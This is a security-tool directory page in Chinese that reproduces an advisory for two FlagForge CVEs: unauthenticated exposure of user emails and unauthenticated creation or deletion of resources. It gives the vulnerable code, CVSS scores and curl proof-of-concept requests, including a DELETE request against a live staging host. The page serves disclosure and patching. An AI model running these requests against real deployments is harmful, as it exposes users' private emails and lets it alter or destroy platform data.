Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-59843-CVE-2025-59932 — CVE on FlagForge on versions 2.0.0 to 2.3.0. Upgrade to version 2.3.1 to fix the issue. | Kitploit
工具/GitHubGitHub/at0mxploit/cve-2025-59843-cve-2025-59932
漏洞分析信息收集Web安全渗透测试错误配置API 安全
GitHubat0mxploit/cve-2025-59843-cve-2025-59932

CVE-2025-59843-CVE-2025-59932

CVE on FlagForge on versions 2.0.0 to 2.3.0. Upgrade to version 2.3.1 to fix the issue.

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
1311个月前尚未审核
分享

CVE-2025-59843 & CVE-2025-59932

1. 用户电子邮件地址公开暴露 CVE-2025-59843

适用范围/受影响应用: FlagForge 网络应用

API 端点: /api/user/[username]

详情: 该端点无需认证即可返回用户电子邮件地址。任何用户名都可以被公开查询。

根本原因/代码引用:

root@kitploit:~
const user = await UserSchema.findOne({
  name: { $regex: new RegExp(`^${username}$`, 'i') }
}).select('name email image totalScore customBadges createdAt role');

// 未执行认证检查
email: user.email, // 公开暴露

严重性(CVSS v4.0):5.5(中危)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:P/CR:M/IR:L/AR:L/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:N/MVA:N/MSC:L/MSI:N/MSA:N/AU:Y/RE:L

影响:攻击者可枚举用户并获取电子邮件地址,可能导致隐私泄露。

概念验证(PoC):

root@kitploit:~
curl "https://staging.flagforge.xyz/api/user/No%20Reply"
示例响应:

{
  "success": true,
  "user": {
    "name": "No Reply",
    "email": "<已编辑>",
    ...
  }
}

2. 潜在未认证资源修改/删除 CVE-2025-59932

适用范围/受影响应用: FlagForge 网络应用

API 端点: /api/resources

详情:

GET /api/resources 公开暴露所有资源。

根据代码审查,POST 和 DELETE 请求未强制实施认证或授权。这些请求未在在线系统上测试,以避免影响生产数据。

观察到的响应头(OPTIONS 请求):

root@kitploit:~
❯ curl -i -X OPTIONS "https://staging.flagforge.xyz/api/resources"
HTTP/2 204
access-control-allow-origin: https://staging.flagforge.xyz
allow: DELETE, GET, HEAD, OPTIONS, POST
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
date: Thu, 25 Sep 2025 15:03:45 GMT
permissions-policy: geolocation=(), microphone=(), camera=(), payment=()
pragma: no-cache
referrer-policy: no-referrer
server: Vercel
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch
x-content-type-options: nosniff
x-frame-options: DENY
x-matched-path: /api/resources
x-vercel-cache: MISS
x-vercel-id: bom1::iad1::v7k72-1758812623945-4e3fad4b58b4
x-xss-protection: 1; mode=block

严重性(CVSS v4.0,若 POST/DELETE 未认证):7.8(高危)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:U/CR:M/IR:H/AR:M/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:H/MVA:L/MSC:L/MSI:H/MSA:L/S:N/AU:Y/RE:M/U:Red

影响:若 POST 或 DELETE 未认证,攻击者可能创建或删除资源,影响平台完整性。

概念验证(PoC):

root@kitploit:~
curl -X GET "https://staging.flagforge.xyz/api/resources"

这将获取资源的 _id。

root@kitploit:~
curl -X POST "https://staging.flagforge.xyz/api/resources" \
-H "Content-Type: application/json" \
-d '{"title":"Test","description":"Test","category":"Web","resourceLink":"https://example.com","uploadedBy":"tester"}'
root@kitploit:~
curl -X DELETE "https://staging.flagforge.xyz/api/resources?id=<resource-id>"

下载工具